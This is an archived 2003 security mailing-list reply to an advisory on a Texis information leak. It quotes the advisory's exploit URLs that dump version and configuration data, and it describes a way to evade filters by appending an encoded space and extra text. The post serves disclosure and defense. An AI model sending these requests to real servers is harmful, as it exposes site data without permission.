Re: @(#)Mordred Labs advisory - Texis sensitive information leak

From: Kurt Seifried (kurtat_private)
Date: Fri Mar 14 2003 - 20:51:59 PST

  • Next message: Eitan Caspi: "Re: [EC-SA-01.2003] Windows XP "welcome screen" exposes the names of all the members of the local administrators group"

    > //@(#) Mordred Security Labs advisory
    >
    > Release date: March 15, 2003
    > Name: Texis sensitive information leak
    > Versions affected: all versions
    > Risk: average
    > Author: Sir Mordred (mordred@s-mail.com, http://mslabs.iwebland.com)
    
    > III. Exploit:
    >
    > http://victim.com/texis.exe/?-version
    > http://victim.com/texis.exe/?-dump
    
    Please note that simply blocking URL's ending in "?-dump" and "?-version"
    won't work. You can append a space and additional text, such as:
    
    http://www.example.org/cgi-bin/texis.exe?-dump%20kjshkjhskjsh.html
    
    I didn't bother to test any other special characters or encoding (i.e.
    UNICODE), I suspect there may be other ones that can be used.
    
    Kurt Seifried, kurtat_private
    A15B BEE5 B391 B9AD B0EF
    AEB0 AD63 0B4E AD56 E574
    http://seifried.org/security/
    



    This archive was generated by hypermail 2b30 : Sat Mar 15 2003 - 14:52:29 PST